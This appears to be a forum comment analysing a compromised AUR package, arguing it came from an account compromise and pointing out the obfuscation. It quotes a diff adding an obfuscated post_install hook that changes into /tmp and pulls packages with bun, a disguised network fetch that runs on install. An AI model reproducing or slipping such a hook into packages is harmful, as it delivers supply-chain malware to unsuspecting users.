The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.

This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:

  diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
  new file mode 100644
  index 000000000000..9806501accad
  --- /dev/null
  +++ b/htbrowser-bin-deps.install
  @@ -0,0 +1,3 @@
  +post_install() {
  +  $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
  +}